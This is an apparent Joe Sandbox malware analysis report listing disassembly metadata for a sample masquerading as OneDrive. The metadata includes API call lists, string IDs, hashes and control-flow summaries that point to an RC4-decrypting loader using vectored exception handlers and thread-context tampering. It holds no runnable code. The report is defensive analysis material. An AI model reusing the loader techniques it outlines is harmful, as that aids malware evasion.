                                                    • Source File: 00000002.00000002.1860113660.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 482840bc5f1a3078e1294c59af60099da02e7692e000dbde6a3e4d00950ae3b5
                                                    • Instruction ID: 2dea30849a461de71e5d4a03d7beaa9a59e87b587be8e542bf430c1c84aea52a
                                                    • Opcode Fuzzy Hash: 482840bc5f1a3078e1294c59af60099da02e7692e000dbde6a3e4d00950ae3b5
                                                    • Instruction Fuzzy Hash: 13026B60B0E68A0FF369A7B884756B977D1EF49304F1900BAD49DC72EBDD1DB8428352
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1860113660.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                    • Instruction ID: 6d0e875e3487154e16ef2ed8281ff20f1ac93b1af21c7f695f13a3f35984f2f3
                                                    • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                    • Instruction Fuzzy Hash: 2301677121CB0C4FD748EF4CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1860113660.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c3f02a2b8ef5a32bb499d2493809e7f94ee755a4930b238c931263fea084cba
                                                    • Instruction ID: 139cd0774f97c2f33ec2a770fe0ef59e07d27c28a3e1234edd9204724efe6364
                                                    • Opcode Fuzzy Hash: 5c3f02a2b8ef5a32bb499d2493809e7f94ee755a4930b238c931263fea084cba
                                                    • Instruction Fuzzy Hash: C5E0E511A1EA9A0FDB28A36D4830294AA91EF49640F1840FFC089C71E7D99418098351

                                                    Execution Graph

                                                    Execution Coverage:1.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:47.3%
                                                    Total number of Nodes:186
                                                    Total number of Limit Nodes:8
                                                    execution_graph (rendered call graph; the node/edge listing is not reproduced). Entry points shown: 7ffdf3ad2039 (GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter); 7ff63ea1e530 (GetStartupInfoW, Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage, then 7ff63ea11384, exit, _cexit); 7ff63ea11384 (EventRegister, EventSetInformation, EventActivityIdControl, EventWriteTransfer, SLOpen, SLpIsCurrentInstalledProductKeyDefaultKey, RoInitialize, CommandLineToArgvW, GetLastError, ChangeWindowMessageFilter, GetMessageW, TranslateMessage, DispatchMessageW, RoUninitialize, EventUnregister, SLClose, CloseHandle, UnregisterWaitEx, LocalFree, __raise_securityfailure); 7ffdf3ad1010 (CreateFileA, GetFileSize, VirtualAlloc, ReadFile, CloseHandle, LoadLibraryW, GetProcAddress, VirtualFree, InitializeCriticalSection, AddVectoredExceptionHandler, GetModuleHandleW, EnterCriticalSection, LeaveCriticalSection, GetCurrentThreadId, OpenThread, GetThreadContext, SetThreadContext, NtQuerySecurityObject, SleepEx, DeleteCriticalSection, RemoveVectoredExceptionHandler, _vswprintf_s_l); 7ffdf3ad25b0 (CRT start-up: IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, __vcrt_initialize_locks, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, memcpy_s, _get_purecall_handler, HeapAlloc, _CrtDumpMemoryLeaks).

                                                    Control-flow Graph

                                                    control_flow_graph for 7ffdf3ad1010-7ffdf3ad1412 (rendered graph with executed/not-executed colouring; the node/edge listing is not reproduced). Blocks call CreateFileA, GetFileSize, VirtualAlloc, ReadFile, VirtualFree, CloseHandle, LoadLibraryW, GetProcAddress, GetModuleHandleW, NtQuerySecurityObject (three call sites), SleepEx, and the internal routines 7ffdf3ad1590, 7ffdf3ad1860, 7ffdf3ad1430 and 7ffdf3ad1550.
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FileHandleVirtual$AddressCloseFreeProc$AllocCreateLibraryLoadModuleObjectQueryReadSecuritySize
                                                    • String ID: @$NTDLL.DLL$NtQuerySecurityObject$SystemFunction033$[!] 0x%0.8X Failed With Error: 0x%0.8X $advapi32.dll$ahrm$jnui$onedrive.dll$oyty$sztw$vhps$vnzj$xcha$zhww
                                                    • API String ID: 871153514-2486118554
                                                    • Opcode ID: 4e14f8f56a3283c630120228ac60a118077f7e1122e4534a4c78e4a8852a491e
                                                    • Instruction ID: c1871be85fef37e880d94bc402360dc31ec7bb043c163e24324f58a5ed7ff57e
                                                    • Opcode Fuzzy Hash: 4e14f8f56a3283c630120228ac60a118077f7e1122e4534a4c78e4a8852a491e
                                                    • Instruction Fuzzy Hash: 09B18C31B09B8295E7A1DF26E864B6936A4FB45794F410339E9AD2ABE8DF3CD105C700

                                                    Control-flow Graph

                                                    control_flow_graph for 7ff63ea11384-7ff63ea1189b (rendered graph with executed/not-executed colouring; the node/edge listing is not reproduced). Blocks call EventRegister, EventSetInformation, EventActivityIdControl, SLOpen, SLpIsCurrentInstalledProductKeyDefaultKey, RoInitialize, CommandLineToArgvW, GetLastError, ChangeWindowMessageFilter, GetMessageW, TranslateMessage, DispatchMessageW, RoUninitialize, EventUnregister, SLClose, CloseHandle, UnregisterWaitEx, LocalFree, and the internal routines 7ff63ea1ef91, 7ff63ea19cac, 7ff63ea11d10, 7ff63ea11008, 7ff63ea118a4, 7ff63ea11c50, 7ff63ea19b6c, 7ff63ea17b1c, 7ff63ea17f30 and 7ff63ea1e7d0.
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Event$CloseMessage$HandleUnregister$RegisterWait$ActivityArgvChangeCommandControlCurrentDefaultDispatchErrorFilterFreeInformationInitializeInstalledLastLineLocalOpenProductTranslateUninitializeWindow
                                                    • String ID:
                                                    • API String ID: 4262568299-0
                                                    • Opcode ID: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
                                                    • Instruction ID: 27b6223d7796cfc9e077c54830d5dc22fea63372fb7b556c7cf169b82af85ef9
                                                    • Opcode Fuzzy Hash: 057ad605cfa734ea69936c5c81ee5022b13314d1383440f342be20a475843f21
                                                    • Instruction Fuzzy Hash: 26E14E31A09A46C6EB108BA2E8402B877A1FFB5B94F458531E90EA7754DF3CE44DE760

                                                    Control-flow Graph

                                                    control_flow_graph for 7ffdf3aeb5a0-7ffdf3aeb9ef (rendered graph with executed/not-executed colouring; the node/edge listing is not reproduced). The only direct API call in this function is HeapAlloc; the remaining blocks call the internal routines 7ffdf3af6620, 7ffdf3aec600, 7ffdf3aeef40, 7ffdf3aef4b0, 7ffdf3aebb40, 7ffdf3b10200, 7ffdf3aea300 and 7ffdf3af66b0.
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$AllocCriticalEnterHeapSection
                                                    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.
                                                    • API String ID: 3996555514-2973468218
                                                    • Opcode ID: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
                                                    • Instruction ID: b8ca3ec5aa35c9260125c11946cc0104ee50f363ede606c1bb1690c403a32491
                                                    • Opcode Fuzzy Hash: b588652198e2ba0bab837f12bb7a4c46ddb51b8bf420c0f2ff2df4b1385cc741
                                                    • Instruction Fuzzy Hash: 9DC1FD35B0CB8585E720DB16E4A4B6A77A0EB85790F524235DEAD5BBE8DF3CD480CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: MemoryVirtual$AllocateProtect
                                                    • String ID:
                                                    • API String ID: 2931642484-0
                                                    • Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                    • Instruction ID: c03f44f47d12fd9784de716a30afe91e5208e4bec6ea89bef0aee9ddd99ced8b
                                                    • Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                    • Instruction Fuzzy Hash: 8F71293161CA484FE75C9F18D8427BA77E1FB84314F54561EFA8BC3292DA34D88386C2

                                                    Control-flow Graph

                                                     Control-flow graph diagram of the function at 7ff63ea1e530 (calls GetStartupInfoW, Sleep, _amsg_exit, _initterm, 7ff63ea1ed10, 7ff63ea11384, exit, _cexit); image not reproduced in text, legend: Executed / Not Executed
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                    • String ID:
                                                    • API String ID: 642454821-0
                                                    • Opcode ID: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
                                                    • Instruction ID: be5c9ca9df0c844b083f542c23a0190c441087b42ce9a8cc4f92fae068a91f81
                                                    • Opcode Fuzzy Hash: dcccb8e6faa13e6eb85182caefda4e784d42338a70b9cfa3f9f0163e6fa78336
                                                    • Instruction Fuzzy Hash: 88616935E0A74682FB608B52E94023936A1FFB4780F548035F94EE37A4DF3CE959A720

                                                    Control-flow Graph

                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3B005CF
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3B00656
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID: %ls$__acrt_lowio_ensure_fh_exists$minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp$static_cast<unsigned>(fh) < _NHANDLE_
                                                    • API String ID: 3216741998-2342959244
                                                    • Opcode ID: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
                                                    • Instruction ID: 0e03d864107a89abab63f9b91338d429aef4cffc13d3c7b4c15a307d2db8ebe6
                                                    • Opcode Fuzzy Hash: ae640927d60817160271a2714da284d25e7b7308b8c6acd019e82179aa0bfa48
                                                    • Instruction Fuzzy Hash: 9B3118B2B1C64296E7109B10E4B4B6A7661FB80344F921135E6EE6B6DDDF7CE544CB00

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Thread$Context$CloseHandleOpen
                                                    • String ID:
                                                    • API String ID: 3699202265-0
                                                    • Opcode ID: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
                                                    • Instruction ID: aafe7137966436c984b103009cbe39935b7021c0f089132cff1e042f288c6915
                                                    • Opcode Fuzzy Hash: d4c4d1f31c04e89d8440c4e2001154f5e439df317c5423af91eed40023814fc9
                                                    • Instruction Fuzzy Hash: AC51C332A14BC185E320CF61ED502DDB7FCFBA5388F11531AEA9856EA9DF7492A0C740

                                                    Control-flow Graph

                                                    APIs
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3B00300
                                                      • Part of subcall function 00007FFDF3AD39B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AD39BE
                                                      • Part of subcall function 00007FFDF3AD85F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FFDF3AD85FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr__crt_unique_heap_ptr
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
                                                    • API String ID: 1054307577-534659383
                                                    • Opcode ID: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
                                                    • Instruction ID: 82d42737ad8f9500deb437b4c7c644f3848af35165be1349b87482bc0566ae9d
                                                    • Opcode Fuzzy Hash: bf5abb50213b255653cb25fdc270292517b4292bdca5e9645a15d9283761075a
                                                    • Instruction Fuzzy Hash: FF414C2272DB8085D780CB1AE0A176EBB60F7C5794F551126FADE5BBE9CF2DC5418B00

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalExceptionHandlerInitializeSectionVectored
                                                    • String ID:
                                                    • API String ID: 1918240263-0
                                                    • Opcode ID: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
                                                    • Instruction ID: 894388678ce14353df4bc4088432d32bbf20b4e8cbdf43b163356a76f4bba088
                                                    • Opcode Fuzzy Hash: fb6ecdb09215081dff59cbbde18696c7f37c7dd433215ad7ce397aa92e144a44
                                                    • Instruction Fuzzy Hash: 56E048A4F0960382FB05D715EC7977422A1BF14304FC20139D47D993D4DF2DD4568700

                                                    Control-flow Graph

                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AF1199
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AF11C4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID:
                                                    • API String ID: 3216741998-0
                                                    • Opcode ID: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
                                                    • Instruction ID: 83281132cdbf87c8e2d8c379dd69dca696f127b088d4760c24358575fc9b9d99
                                                    • Opcode Fuzzy Hash: 1eb003dd854b58748907cb2f28eedebdd14ecbd62e688982f457d1efa163928a
                                                    • Instruction Fuzzy Hash: FFE04600F0C2C281F36972728432BBA29406F41308F460238EAAD2C2DFCE1CE1108726

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalDeleteExceptionHandlerRemoveSectionVectored
                                                    • String ID:
                                                    • API String ID: 1384964762-0
                                                    • Opcode ID: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
                                                    • Instruction ID: 9bc4b3cac77a0264a31b12cc67aed0c7a29ef10601ac984ce63066ee31c72b76
                                                    • Opcode Fuzzy Hash: 5603965f67bc51f021bb451bf859e20d88480dca11bf105668d04a671e603702
                                                    • Instruction Fuzzy Hash: EBD01798F0A40385FB46AF62DCB8AB02350AF54700FC60234C87EE92D8DE1CE68A8700

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
                                                    • Instruction ID: 4029b55b395979ca5c666d06cd371b57a9e047fe13cdbe6ea1d48d7cd5cac38d
                                                    • Opcode Fuzzy Hash: d8a67680f0db511946e090e78dcfaad3c4524fee8cf677f73070562d12118055
                                                    • Instruction Fuzzy Hash: CB217F25B0874381F7928B5395A49797290FF44B84F5A4235EE6EAB7D8DF3CE4418600

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _get_purecall_handler
                                                    • String ID:
                                                    • API String ID: 2826984366-0
                                                    • Opcode ID: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
                                                    • Instruction ID: ebe6b81a4cc0704bb4e8cbb7fe2efae11800df10f98539698dd93299ae84fb77
                                                    • Opcode Fuzzy Hash: ad07be3e6c2b22536b3f255321fe498e304bc87f9b5340cb5d734495a9b1ccba
                                                    • Instruction Fuzzy Hash: E011216261C78185E3209B57B054B6EBBA0E794384F050135FEEE5AADDDF6CD580CF10

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __security_init_cookie
                                                    • String ID:
                                                    • API String ID: 1916132197-0
                                                    • Opcode ID: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
                                                    • Instruction ID: 08d31af19c78d93c1c24ebe4520c020ffacb9086f728ce166d3a414b6ef80d17
                                                    • Opcode Fuzzy Hash: 1ea7b90c7907bc48940007c29d94137a28260e46411c2c610252b12d6915dafa
                                                    • Instruction Fuzzy Hash: 90C08C3AA2918282C340A712E0528EA7320FFC5780F402121FB4E2378ECE2CD4008A00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: memset$CloseErrorHandleLastProcessThreadWindow
                                                    • String ID: %windir%\ImmersiveControlPanel\SystemSettings.exe$2F8FA37B-8158-476F-9B22-3283D2A6FEC2$A0BB30C7-DEC2-4BFD-AF5F-DC6612D74584
                                                    • API String ID: 3504613239-2751644673
                                                    • Opcode ID: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
                                                    • Instruction ID: 86fc18aff94638cb7b11323e44af982ffb3e01a4cb1265b4e42625d4112279d0
                                                    • Opcode Fuzzy Hash: 4b6fd73fe6a43ca1d551fd65e3bdd0a8ed6c5294c22ee6cbe672d89829c46d4f
                                                    • Instruction Fuzzy Hash: 01A15432A08B4287E7149B62E8502B97BE1FFB9B81F458135EA4ED7790DF3CD4499720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectElement@$Descendent@ElementFindFreeListener@Listener@2@@TaskV12@
                                                    • String ID: CallNumber$IIDText$Instructions$Number1$Number2$Number3$Number4$Number5$Number6$Number7$Number8$Number9$PrivacyLink$TollFree$TollMain
                                                    • API String ID: 4084670624-4122676257
                                                    • Opcode ID: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
